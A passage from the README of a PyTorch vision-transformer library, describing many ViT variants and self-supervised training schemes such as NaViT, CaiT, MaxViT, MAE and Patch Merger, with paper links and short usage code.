256) preds = v(img) # (1, 1000) ``` ## Parameters - `image_size`: int. Image size. If you have rectangular images, make sure your image size is the maximum of the width and height - `patch_size`: int. Size of patches. `image_size` must be divisible by `patch_size`. The number of patches is: ` n = (image_size // patch_size) ** 2` and `n` **must be greater than 16**. - `num_classes`: int. Number of classes to classify. - `dim`: int. Last dimension of output tensor after linear transformation `nn.Linear(..., dim)`. - `depth`: int. Number of Transformer blocks. - `heads`: int. Number of heads in Multi-head Attention layer. - `mlp_dim`: int. Dimension of the MLP (FeedForward) layer. 
- `channels`: int, default `3`. Number of image's channels. - `dropout`: float between `[0, 1]`, default `0.`. Dropout rate. - `emb_dropout`: float between `[0, 1]`, default `0`. Embedding dropout rate. - `pool`: string, either `cls` token pooling or `mean` pooling ## Simple ViT <a href="https://arxiv.org/abs/2205.01580">An update</a> from some of the same authors of the original paper proposes simplifications to `ViT` that allows it to train faster and better. Among these simplifications include 2d sinusoidal positional embedding, global average pooling (no CLS token), no dropout, batch sizes of 1024 rather than 4096, and use of RandAugment and MixUp augmentations. They also show that a simple linear at the end is not significantly worse than the original MLP head You can use it by importing the `SimpleViT` as shown below ```python import torch from vit_pytorch import SimpleViT v = SimpleViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## NaViT <img src="./images/navit.png" width="450px"></img> <a href="https://arxiv.org/abs/2307.06304">This paper</a> proposes to leverage the flexibility of attention and masking for variable lengthed sequences to train images of multiple resolution, packed into a single batch. They demonstrate much faster training and improved accuracies, with the only cost being extra complexity in the architecture and dataloading. They use factorized 2d positional encodings, token dropping, as well as query-key normalization. You can use it as follows ```python import torch from vit_pytorch.na_vit import NaViT v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, token_dropout_prob = 0.1 # token dropout of 10% (keep 90% of tokens) ) # 5 images of different resolutions - List[List[Tensor]] # for now, you'll have to correctly place images in same batch element as to not exceed maximum allowed sequence length for self-attention w/ masking images = [ [torch.randn(3, 256, 256), torch.randn(3, 128, 128)], [torch.randn(3, 128, 256), torch.randn(3, 256, 128)], [torch.randn(3, 64, 256)] ] preds = v(images) # (5, 1000) - 5, because 5 images of different resolution above ``` Or if you would rather that the framework auto group the images into variable lengthed sequences that do not exceed a certain max length ```python images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] preds = v( images, group_images = True, group_max_seq_len = 64 ) # (5, 1000) ``` Finally, if you would like to make use of a flavor of NaViT using <a href="https://pytorch.org/tutorials/prototype/nestedtensor.html">nested tensors</a> (which will omit a lot of the masking and padding altogether), make sure you are on version `2.4` and import as follows ```python import torch from vit_pytorch.na_vit_nested_tensor import NaViT v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0., emb_dropout = 0., token_dropout_prob = 0.1 ) # 5 images of different resolutions - List[Tensor] images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] preds = v(images) assert preds.shape == (5, 1000) ``` ## Distillation <img src="./images/distill.png" width="300px"></img> A 
recent <a href="https://arxiv.org/abs/2012.12877">paper</a> has shown that use of a distillation token for distilling knowledge from convolutional nets to vision transformer can yield small and efficient vision transformers. This repository offers the means to do distillation easily. ex. distilling from Resnet50 (or any teacher) to a vision transformer ```python import torch from torchvision.models import resnet50 from vit_pytorch.distill import DistillableViT, DistillWrapper teacher = resnet50(pretrained = True) v = DistillableViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) distiller = DistillWrapper( student = v, teacher = teacher, temperature = 3, # temperature of distillation alpha = 0.5, # trade between main loss and distillation loss hard = False # whether to use soft or hard distillation ) img = torch.randn(2, 3, 256, 256) labels = torch.randint(0, 1000, (2,)) loss = distiller(img, labels) loss.backward() # after lots of training above ... pred = v(img) # (2, 1000) ``` The `DistillableViT` class is identical to `ViT` except for how the forward pass is handled, so you should be able to load the parameters back to `ViT` after you have completed distillation training. You can also use the handy `.to_vit` method on the `DistillableViT` instance to get back a `ViT` instance. ```python v = v.to_vit() type(v) # <class 'vit_pytorch.vit_pytorch.ViT'> ``` ## Deep ViT This <a href="https://arxiv.org/abs/2103.11886">paper</a> notes that ViT struggles to attend at greater depths (past 12 layers), and suggests mixing the attention of each head post-softmax as a solution, dubbed Re-attention. The results line up with the <a href="https://github.com/lucidrains/x-transformers#talking-heads-attention">Talking Heads</a> paper from NLP. You can use it as follows ```python import torch from vit_pytorch.deepvit import DeepViT v = DeepViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## CaiT <a href="https://arxiv.org/abs/2103.17239">This paper</a> also notes difficulty in training vision transformers at greater depths and proposes two solutions. First it proposes to do per-channel multiplication of the output of the residual block. Second, it proposes to have the patches attend to one another, and only allow the CLS token to attend to the patches in the last few layers. They also add <a href="https://github.com/lucidrains/x-transformers#talking-heads-attention">Talking Heads</a>, noting improvements You can use this scheme as follows ```python import torch from vit_pytorch.cait import CaiT v = CaiT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 12, # depth of transformer for patch to patch attention only cls_depth = 2, # depth of cross attention of CLS tokens to patch heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, layer_dropout = 0.05 # randomly dropout 5% of the layers ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Token-to-Token ViT <img src="./images/t2t.png" width="400px"></img> <a href="https://arxiv.org/abs/2101.11986">This paper</a> proposes that the first couple layers should downsample the image sequence by unfolding, leading to overlapping image data in each token as shown in the figure above. You can use this variant of the `ViT` as follows. 
```python import torch from vit_pytorch.t2t import T2TViT v = T2TViT( dim = 512, image_size = 224, depth = 5, heads = 8, mlp_dim = 512, num_classes = 1000, t2t_layers = ((7, 4), (3, 2), (3, 2)) # tuples of the kernel size and stride of each consecutive layers of the initial token to token module ) img = torch.randn(1, 3, 224, 224) preds = v(img) # (1, 1000) ``` ## CCT <img src="https://raw.githubusercontent.com/SHI-Labs/Compact-Transformers/main/images/model_sym.png" width="400px"></img> <a href="https://arxiv.org/abs/2104.05704">CCT</a> proposes compact transformers by using convolutions instead of patching and performing sequence pooling. This allows for CCT to have high accuracy and a low number of parameters. You can use this with two methods ```python import torch from vit_pytorch.cct import CCT cct = CCT( img_size = (224, 448), embedding_dim = 384, n_conv_layers = 2, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_layers = 14, num_heads = 6, mlp_ratio = 3., num_classes = 1000, positional_embedding = 'learnable', # ['sine', 'learnable', 'none'] ) img = torch.randn(1, 3, 224, 448) pred = cct(img) # (1, 1000) ``` Alternatively you can use one of several pre-defined models `[2,4,6,7,8,14,16]` which pre-define the number of layers, number of attention heads, the mlp ratio, and the embedding dimension. ```python import torch from vit_pytorch.cct import cct_14 cct = cct_14( img_size = 224, n_conv_layers = 1, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_classes = 1000, positional_embedding = 'learnable', # ['sine', 'learnable', 'none'] ) ``` <a href="https://github.com/SHI-Labs/Compact-Transformers">Official Repository</a> includes links to pretrained model checkpoints. ## Cross ViT <img src="./images/cross_vit.png" width="400px"></img> <a href="https://arxiv.org/abs/2103.14899">This paper</a> proposes to have two vision transformers processing the image at different scales, cross attending to one every so often. They show improvements on top of the base vision transformer. ```python import torch from vit_pytorch.cross_vit import CrossViT v = CrossViT( image_size = 256, num_classes = 1000, depth = 4, # number of multi-scale encoding blocks sm_dim = 192, # high res dimension sm_patch_size = 16, # high res patch size (should be smaller than lg_patch_size) sm_enc_depth = 2, # high res depth sm_enc_heads = 8, # high res heads sm_enc_mlp_dim = 2048, # high res feedforward dimension lg_dim = 384, # low res dimension lg_patch_size = 64, # low res patch size lg_enc_depth = 3, # low res depth lg_enc_heads = 8, # low res heads lg_enc_mlp_dim = 2048, # low res feedforward dimensions cross_attn_depth = 2, # cross attention rounds cross_attn_heads = 8, # cross attention heads dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) pred = v(img) # (1, 1000) ``` ## PiT <img src="./images/pit.png" width="400px"></img> <a href="https://arxiv.org/abs/2103.16302">This paper</a> proposes to downsample the tokens through a pooling procedure using depth-wise convolutions. 
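The pooling step itself is small: the spatial tokens are folded back into a feature map, downsampled by a strided depthwise convolution that also doubles the channel dimension, and the CLS token is projected by a plain linear layer, mirroring the `Pool` module in `vit_pytorch/pit.py` included above. A minimal sketch with illustrative names (e.g. `TokenPool`):

```python
import torch
from torch import nn
from einops import rearrange

class TokenPool(nn.Module):
    def __init__(self, dim):
        super().__init__()
        # depthwise conv (3x3, stride 2) halves the spatial resolution and doubles the channel dim
        self.downsample = nn.Sequential(
            nn.Conv2d(dim, dim * 2, kernel_size = 3, stride = 2, padding = 1, groups = dim),
            nn.Conv2d(dim * 2, dim * 2, kernel_size = 1)
        )
        self.cls_ff = nn.Linear(dim, dim * 2)  # CLS token is pooled with a plain linear

    def forward(self, x):
        cls_token, tokens = x[:, :1], x[:, 1:]
        h = int(tokens.shape[1] ** 0.5)
        tokens = rearrange(tokens, 'b (h w) c -> b c h w', h = h)
        tokens = self.downsample(tokens)
        tokens = rearrange(tokens, 'b c h w -> b (h w) c')
        return torch.cat((self.cls_ff(cls_token), tokens), dim = 1)

pool = TokenPool(dim = 256)
x = torch.randn(1, 1 + 16 * 16, 256)  # CLS token + 16x16 spatial tokens
print(pool(x).shape)                  # torch.Size([1, 65, 512]) -> 1 + 8x8 tokens, doubled dim
```

The full `PiT` model below alternates transformer stages with this kind of pooling.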
```python
import torch
from vit_pytorch.pit import PiT

v = PiT(
    image_size = 224,
    patch_size = 14,
    dim = 256,
    num_classes = 1000,
    depth = (3, 3, 3),    # list of depths, indicating the number of rounds of each stage before a downsample
    heads = 16,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

# forward pass now returns predictions and the attention maps

img = torch.randn(1, 3, 224, 224)

preds = v(img) # (1, 1000)
```

## LeViT

<img src="./images/levit.png" width="300px"></img>

<a href="https://arxiv.org/abs/2104.01136">This paper</a> proposes a number of changes, including (1) convolutional embedding instead of patch-wise projection (2) downsampling in stages (3) extra non-linearity in attention (4) 2d relative positional biases instead of initial absolute positional bias (5) batchnorm in place of layernorm.

<a href="https://github.com/facebookresearch/LeViT">Official repository</a>

```python
import torch
from vit_pytorch.levit import LeViT

levit = LeViT(
    image_size = 224,
    num_classes = 1000,
    stages = 3,             # number of stages
    dim = (256, 384, 512),  # dimensions at each stage
    depth = 4,              # transformer of depth 4 at each stage
    heads = (4, 6, 8),      # heads at each stage
    mlp_mult = 2,
    dropout = 0.1
)

img = torch.randn(1, 3, 224, 224)

levit(img) # (1, 1000)
```

## CvT

<img src="./images/cvt.png" width="400px"></img>

<a href="https://arxiv.org/abs/2103.15808">This paper</a> proposes mixing convolutions and attention. Specifically, convolutions are used to embed and downsample the image / feature map in three stages. Depthwise convolution is also used to project the queries, keys, and values for attention.

```python
import torch
from vit_pytorch.cvt import CvT

v = CvT(
    num_classes = 1000,
    s1_emb_dim = 64,        # stage 1 - dimension
    s1_emb_kernel = 7,      # stage 1 - conv kernel
    s1_emb_stride = 4,      # stage 1 - conv stride
    s1_proj_kernel = 3,     # stage 1 - attention ds-conv kernel size
    s1_kv_proj_stride = 2,  # stage 1 - attention key / value projection stride
    s1_heads = 1,           # stage 1 - heads
    s1_depth = 1,           # stage 1 - depth
    s1_mlp_mult = 4,        # stage 1 - feedforward expansion factor
    s2_emb_dim = 192,       # stage 2 - (same as above)
    s2_emb_kernel = 3,
    s2_emb_stride = 2,
    s2_proj_kernel = 3,
    s2_kv_proj_stride = 2,
    s2_heads = 3,
    s2_depth = 2,
    s2_mlp_mult = 4,
    s3_emb_dim = 384,       # stage 3 - (same as above)
    s3_emb_kernel = 3,
    s3_emb_stride = 2,
    s3_proj_kernel = 3,
    s3_kv_proj_stride = 2,
    s3_heads = 4,
    s3_depth = 10,
    s3_mlp_mult = 4,
    dropout = 0.
)

img = torch.randn(1, 3, 224, 224)

pred = v(img) # (1, 1000)
```

## Twins SVT

<img src="./images/twins_svt.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2104.13840">paper</a> proposes mixing local and global attention, along with a position encoding generator (proposed in <a href="https://arxiv.org/abs/2102.10882">CPVT</a>) and global average pooling, to achieve the same results as <a href="https://arxiv.org/abs/2103.14030">Swin</a>, without the extra complexity of shifted windows, CLS tokens, nor positional embeddings.
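The position encoding generator (PEG) from CPVT referenced here is commonly described as a small depthwise convolution over the token grid with a residual connection, so positional information is generated conditionally from the input rather than read from a fixed table. A rough sketch under that reading (the `PosEncodingGenerator` name and shapes are illustrative, not the library's API):

```python
import torch
from torch import nn
from einops import rearrange

class PosEncodingGenerator(nn.Module):
    """Conditional positional encoding: a depthwise conv over the token grid, added residually."""
    def __init__(self, dim, kernel_size = 3):
        super().__init__()
        self.proj = nn.Conv2d(dim, dim, kernel_size, padding = kernel_size // 2, groups = dim)

    def forward(self, x, height, width):
        # x: (batch, num_tokens, dim) with num_tokens == height * width
        fmap = rearrange(x, 'b (h w) d -> b d h w', h = height, w = width)
        return x + rearrange(self.proj(fmap), 'b d h w -> b (h w) d')

peg = PosEncodingGenerator(dim = 64, kernel_size = 3)
tokens = torch.randn(1, 56 * 56, 64)           # stage 1 tokens for a 224 image with patch size 4
tokens = peg(tokens, height = 56, width = 56)  # same shape, now carrying positional information
```

The `TwinsSVT` usage below exposes the kernel size of this generator via `peg_kernel_size`.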
```python
import torch
from vit_pytorch.twins_svt import TwinsSVT

model = TwinsSVT(
    num_classes = 1000,       # number of output classes
    s1_emb_dim = 64,          # stage 1 - patch embedding projected dimension
    s1_patch_size = 4,        # stage 1 - patch size for patch embedding
    s1_local_patch_size = 7,  # stage 1 - patch size for local attention
    s1_global_k = 7,          # stage 1 - global attention key / value reduction factor, defaults to 7 as specified in paper
    s1_depth = 1,             # stage 1 - number of transformer blocks (local attn -> ff -> global attn -> ff)
    s2_emb_dim = 128,         # stage 2 (same as above)
    s2_patch_size = 2,
    s2_local_patch_size = 7,
    s2_global_k = 7,
    s2_depth = 1,
    s3_emb_dim = 256,         # stage 3 (same as above)
    s3_patch_size = 2,
    s3_local_patch_size = 7,
    s3_global_k = 7,
    s3_depth = 5,
    s4_emb_dim = 512,         # stage 4 (same as above)
    s4_patch_size = 2,
    s4_local_patch_size = 7,
    s4_global_k = 7,
    s4_depth = 4,
    peg_kernel_size = 3,      # positional encoding generator kernel size
    dropout = 0.              # dropout
)

img = torch.randn(1, 3, 224, 224)

pred = model(img) # (1, 1000)
```

## RegionViT

<img src="./images/regionvit.png" width="400px"></img>

<img src="./images/regionvit2.png" width="400px"></img>

<a href="https://arxiv.org/abs/2106.02689">This paper</a> proposes to divide up the feature map into local regions, whereby the local tokens attend to each other. Each local region has its own regional token, which then attends to all its local tokens as well as to the other regional tokens.

You can use it as follows

```python
import torch
from vit_pytorch.regionvit import RegionViT

model = RegionViT(
    dim = (64, 128, 256, 512),      # tuple of size 4, indicating dimension at each stage
    depth = (2, 2, 8, 2),           # depth of the region to local transformer at each stage
    window_size = 7,                # window size, which should be either 7 or 14
    num_classes = 1000,             # number of output classes
    tokenize_local_3_conv = False,  # whether to use a 3 layer convolution to encode the local tokens from the image. the paper uses this for the smaller models, but uses only 1 conv (set to False) for the larger models
    use_peg = False,                # whether to use positional generating module. they used this for object detection for a boost in performance
)

img = torch.randn(1, 3, 224, 224)

pred = model(img) # (1, 1000)
```

## CrossFormer

<img src="./images/crossformer.png" width="400px"></img>

<img src="./images/crossformer2.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2108.00154">paper</a> beats PVT and Swin using alternating local and global attention. The global attention is done across the windowing dimension for reduced complexity, much like the scheme used for axial attention.

They also have a cross-scale embedding layer, which they show to be a generic layer that can improve all vision transformers. Dynamic relative positional bias was also formulated to allow the net to generalize to images of greater resolution.
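One common reading of the cross-scale embedding layer is that each patch location is embedded with several kernel sizes at once (same stride, different receptive fields) and the results are concatenated along the channel dimension. The sketch below illustrates that reading; the `CrossScaleEmbedding` name, kernel sizes, and channel split are illustrative and not necessarily the exact configuration of the paper or of `vit_pytorch/crossformer.py`.

```python
import torch
from torch import nn

class CrossScaleEmbedding(nn.Module):
    """Embed the same grid of positions with several kernel sizes and concatenate the results."""
    def __init__(self, dim_in, dim_out, kernel_sizes = (4, 8, 16, 32), stride = 4):
        super().__init__()
        assert dim_out % len(kernel_sizes) == 0
        dim_each = dim_out // len(kernel_sizes)
        # all convs share the stride, so every scale produces the same token grid
        self.convs = nn.ModuleList([
            nn.Conv2d(dim_in, dim_each, kernel_size = k, stride = stride, padding = (k - stride) // 2)
            for k in kernel_sizes
        ])

    def forward(self, x):
        return torch.cat([conv(x) for conv in self.convs], dim = 1)

embed = CrossScaleEmbedding(dim_in = 3, dim_out = 64)
img = torch.randn(1, 3, 224, 224)
print(embed(img).shape)  # torch.Size([1, 64, 56, 56])
```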
```python import torch from vit_pytorch.crossformer import CrossFormer model = CrossFormer( num_classes = 1000, # number of output classes dim = (64, 128, 256, 512), # dimension at each stage depth = (2, 2, 8, 2), # depth of transformer at each stage global_window_size = (8, 4, 2, 1), # global window sizes at each stage local_window_size = 7, # local window size (can be customized for each stage, but in paper, held constant at 7 for all stages) ) img = torch.randn(1, 3, 224, 224) pred = model(img) # (1, 1000) ``` ## ScalableViT <img src="./images/scalable-vit-1.png" width="400px"></img> <img src="./images/scalable-vit-2.png" width="400px"></img> This Bytedance AI <a href="https://arxiv.org/abs/2203.10790">paper</a> proposes the Scalable Self Attention (SSA) and the Interactive Windowed Self Attention (IWSA) modules. The SSA alleviates the computation needed at earlier stages by reducing the key / value feature map by some factor (`reduction_factor`), while modulating the dimension of the queries and keys (`ssa_dim_key`). The IWSA performs self attention within local windows, similar to other vision transformer papers. However, they add a residual of the values, passed through a convolution of kernel size 3, which they named Local Interactive Module (LIM). They make the claim in this paper that this scheme outperforms Swin Transformer, and also demonstrate competitive performance against Crossformer. You can use it as follows (ex. ScalableViT-S) ```python import torch from vit_pytorch.scalable_vit import ScalableViT model = ScalableViT( num_classes = 1000, dim = 64, # starting model dimension. at every stage, dimension is doubled heads = (2, 4, 8, 16), # number of attention heads at each stage depth = (2, 2, 20, 2), # number of transformer blocks at each stage ssa_dim_key = (40, 40, 40, 32), # the dimension of the attention keys (and queries) for SSA. in the paper, they represented this as a scale factor on the base dimension per key (ssa_dim_key / dim_key) reduction_factor = (8, 4, 2, 1), # downsampling of the key / values in SSA. in the paper, this was represented as (reduction_factor ** -2) window_size = (64, 32, None, None), # window size of the IWSA at each stage. None means no windowing needed dropout = 0.1, # attention and feedforward dropout ) img = torch.randn(1, 3, 256, 256) preds = model(img) # (1, 1000) ``` ## SepViT <img src="./images/sep-vit.png" width="400px"></img> Another <a href="https://arxiv.org/abs/2203.15380">Bytedance AI paper</a>, it proposes a depthwise-pointwise self-attention layer that seems largely inspired by mobilenet's depthwise-separable convolution. The most interesting aspect is the reuse of the feature map from the depthwise self-attention stage as the values for the pointwise self-attention, as shown in the diagram above. I have decided to include only the version of `SepViT` with this specific self-attention layer, as the grouped attention layers are not remarkable nor novel, and the authors were not clear on how they treated the window tokens for the group self-attention layer. Besides, it seems like with `DSSA` layer alone, they were able to beat Swin. ex. 
SepViT-Lite

```python
import torch
from vit_pytorch.sep_vit import SepViT

v = SepViT(
    num_classes = 1000,
    dim = 32,              # dimensions of first stage, which doubles every stage (32, 64, 128, 256) for SepViT-Lite
    dim_head = 32,         # attention head dimension
    heads = (1, 2, 4, 8),  # number of heads per stage
    depth = (1, 2, 6, 2),  # number of transformer blocks per stage
    window_size = 7,       # window size of DSS Attention block
    dropout = 0.1          # dropout
)

img = torch.randn(1, 3, 224, 224)

preds = v(img) # (1, 1000)
```

## MaxViT

<img src="./images/max-vit.png" width="400px"></img>

<a href="https://arxiv.org/abs/2204.01697">This paper</a> proposes a hybrid convolutional / attention network, using MBConv from the convolution side, and then block / grid axial sparse attention.

They also claim this specific vision transformer is good for generative models (GANs).

ex. MaxViT-S

```python
import torch
from vit_pytorch.max_vit import MaxViT

v = MaxViT(
    num_classes = 1000,
    dim_conv_stem = 64,           # dimension of the convolutional stem, would default to dimension of first layer if not specified
    dim = 96,                     # dimension of first layer, doubles every layer
    dim_head = 32,                # dimension of attention heads, kept at 32 in paper
    depth = (2, 2, 5, 2),         # number of MaxViT blocks per stage, which consists of MBConv, block-like attention, grid-like attention
    window_size = 7,              # window size for block and grids
    mbconv_expansion_rate = 4,    # expansion rate of MBConv
    mbconv_shrinkage_rate = 0.25, # shrinkage rate of squeeze-excitation in MBConv
    dropout = 0.1                 # dropout
)

img = torch.randn(2, 3, 224, 224)

preds = v(img) # (2, 1000)
```

## NesT

<img src="./images/nest.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2105.12723">paper</a> decided to process the image in hierarchical stages, with attention only within tokens of local blocks, which aggregate as it moves up the hierarchy. The aggregation is done in the image plane, and contains a convolution and subsequent maxpool to allow it to pass information across the boundary.

You can use it with the following code (ex. NesT-T)

```python
import torch
from vit_pytorch.nest import NesT

nest = NesT(
    image_size = 224,
    patch_size = 4,
    dim = 96,
    heads = 3,
    num_hierarchies = 3,        # number of hierarchies
    block_repeats = (2, 2, 8),  # the number of transformer blocks at each hierarchy, starting from the bottom
    num_classes = 1000
)

img = torch.randn(1, 3, 224, 224)

pred = nest(img) # (1, 1000)
```

## MobileViT

<img src="./images/mbvit.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2110.02178">paper</a> introduces MobileViT, a light-weight and general purpose vision transformer for mobile devices. MobileViT presents a different perspective for the global processing of information with transformers.

You can use it with the following code (ex. mobilevit_xs)

```python
import torch
from vit_pytorch.mobile_vit import MobileViT

mbvit_xs = MobileViT(
    image_size = (256, 256),
    dims = [96, 120, 144],
    channels = [16, 32, 48, 48, 64, 64, 80, 80, 96, 96, 384],
    num_classes = 1000
)

img = torch.randn(1, 3, 256, 256)

pred = mbvit_xs(img) # (1, 1000)
```

## XCiT

<img src="./images/xcit.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2106.09681">paper</a> introduces the cross covariance attention (abbreviated XCA). One can think of it as doing attention across the features dimension rather than the spatial one (another perspective would be a dynamic 1x1 convolution, the kernel being the attention map defined by spatial correlations).
Technically, this amounts to simply transposing the query, key, values before executing cosine similarity attention with learned temperature. ```python import torch from vit_pytorch.xcit import XCiT v = XCiT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 12, # depth of xcit transformer cls_depth = 2, # depth of cross attention of CLS tokens to patch, attention pool at end heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, layer_dropout = 0.05, # randomly dropout 5% of the layers local_patch_kernel_size = 3 # kernel size of the local patch interaction module (depthwise convs) ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Simple Masked Image Modeling <img src="./images/simmim.png" width="400px"/> This <a href="https://arxiv.org/abs/2111.09886">paper</a> proposes a simple masked image modeling (SimMIM) scheme, using only a linear projection off the masked tokens into pixel space followed by an L1 loss with the pixel values of the masked patches. Results are competitive with other more complicated approaches. You can use this as follows ```python import torch from vit_pytorch import ViT from vit_pytorch.simmim import SimMIM v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) mim = SimMIM( encoder = v, masking_ratio = 0.5 # they found 50% to yield the best results ) images = torch.randn(8, 3, 256, 256) loss = mim(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn torch.save(v.state_dict(), './trained-vit.pt') ``` ## Masked Autoencoder <img src="./images/mae.png" width="400px"/> A new <a href="https://arxiv.org/abs/2111.06377">Kaiming He paper</a> proposes a simple autoencoder scheme where the vision transformer attends to a set of unmasked patches, and a smaller decoder tries to reconstruct the masked pixel values. <a href="https://www.youtube.com/watch?v=LKixq2S2Pz8">DeepReader quick paper review</a> <a href="https://www.youtube.com/watch?v=Dp6iICL2dVI">AI Coffeebreak with Letitia</a> You can use it with the following code ```python import torch from vit_pytorch import ViT, MAE v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) mae = MAE( encoder = v, masking_ratio = 0.75, # the paper recommended 75% masked patches decoder_dim = 512, # paper showed good results with just 512 decoder_depth = 6 # anywhere from 1 to 8 ) images = torch.randn(8, 3, 256, 256) loss = mae(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn # save your improved vision transformer torch.save(v.state_dict(), './trained-vit.pt') ``` ## Masked Patch Prediction Thanks to <a href="https://github.com/zankner">Zach</a>, you can train using the original masked patch prediction task presented in the paper, with the following code. 
```python import torch from vit_pytorch import ViT from vit_pytorch.mpp import MPP model = ViT( image_size=256, patch_size=32, num_classes=1000, dim=1024, depth=6, heads=8, mlp_dim=2048, dropout=0.1, emb_dropout=0.1 ) mpp_trainer = MPP( transformer=model, patch_size=32, dim=1024, mask_prob=0.15, # probability of using token in masked prediction task random_patch_prob=0.30, # probability of randomly replacing a token being used for mpp replace_prob=0.50, # probability of replacing a token being used for mpp with the mask token ) opt = torch.optim.Adam(mpp_trainer.parameters(), lr=3e-4) def sample_unlabelled_images(): return torch.FloatTensor(20, 3, 256, 256).uniform_(0., 1.) for _ in range(100): images = sample_unlabelled_images() loss = mpp_trainer(images) opt.zero_grad() loss.backward() opt.step() # save your improved network torch.save(model.state_dict(), './pretrained-net.pt') ``` ## Masked Position Prediction <img src="./images/mp3.png" width="400px"></img> New <a href="https://arxiv.org/abs/2207.07611">paper</a> that introduces masked position prediction pre-training criteria. This strategy is more efficient than the Masked Autoencoder strategy and has comparable performance. ```python import torch from vit_pytorch.mp3 import ViT, MP3 v = ViT( num_classes = 1000, image_size = 256, patch_size = 8, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, ) mp3 = MP3( vit = v, masking_ratio = 0.75 ) images = torch.randn(8, 3, 256, 256) loss = mp3(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn # save your improved vision transformer torch.save(v.state_dict(), './trained-vit.pt') ``` ## Adaptive Token Sampling <img src="./images/ats.png" width="400px"></img> This <a href="https://arxiv.org/abs/2111.15667">paper</a> proposes to use the CLS attention scores, re-weighed by the norms of the value heads, as means to discard unimportant tokens at different layers. ```python import torch from vit_pytorch.ats_vit import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, max_tokens_per_depth = (256, 128, 64, 32, 16, 8), # a tuple that denotes the maximum number of tokens that any given layer should have. if the layer has greater than this amount, it will undergo adaptive token sampling heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (4, 1000) # you can also get a list of the final sampled patch ids # a value of -1 denotes padding preds, token_ids = v(img, return_sampled_token_ids = True) # (4, 1000), (4, <=8) ``` ## Patch Merger <img src="./images/patch_merger.png" width="400px"></img> This <a href="https://arxiv.org/abs/2202.12015">paper</a> proposes a simple module (Patch Merger) for reducing the number of tokens at any layer of a vision transformer without sacrificing performance. 
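The idea, roughly: a small set of learned queries attends over the incoming tokens, and the attention-weighted combination of those tokens becomes the new, smaller token set. Below is a minimal sketch of that mechanism; it is a simplified illustration based on the paper's description, not the module shipped in `vit_pytorch.vit_with_patch_merger`, and `PatchMergerSketch` is a made-up name.

```python
import torch
from torch import nn

class PatchMergerSketch(nn.Module):
    """Merge num_tokens input tokens down to num_tokens_out via learned queries (simplified)."""
    def __init__(self, dim, num_tokens_out):
        super().__init__()
        self.scale = dim ** -0.5
        self.norm = nn.LayerNorm(dim)
        self.queries = nn.Parameter(torch.randn(num_tokens_out, dim))   # learned output tokens

    def forward(self, x):                                              # x: (batch, num_tokens, dim)
        x = self.norm(x)
        attn = (self.queries @ x.transpose(-2, -1)) * self.scale       # (batch, num_tokens_out, num_tokens)
        return attn.softmax(dim = -1) @ x                              # (batch, num_tokens_out, dim)

tokens = torch.randn(4, 256, 1024)
merged = PatchMergerSketch(dim = 1024, num_tokens_out = 8)(tokens)     # (4, 8, 1024)
```

The end-to-end integration below exposes this through `patch_merge_layer` and `patch_merge_num_tokens`: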
```python
import torch
from vit_pytorch.vit_with_patch_merger import ViT

v = ViT(
    image_size = 256,
    patch_size = 16,
    num_classes = 1000,
    dim = 1024,
    depth = 12,
    heads = 8,
    patch_merge_layer = 6,        # at which transformer layer to do patch merging
    patch_merge_num_tokens = 8,   # the output number of tokens from the patch merge
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

img = torch.randn(4, 3, 256, 256)

preds = v(img) # (4, 1000)
```

One can also use the `PatchMerger` module by itself

```python
import torch
from vit_pytorch.vit_with_patch_merger import PatchMerger

merger = PatchMerger(
    dim = 1024,
    num_tokens_out = 8   # output number of tokens
)

features = torch.randn(4, 256, 1024) # (batch, num tokens, dimension)

out = merger(features) # (4, 8, 1024)
```

## Vision Transformer for Small Datasets

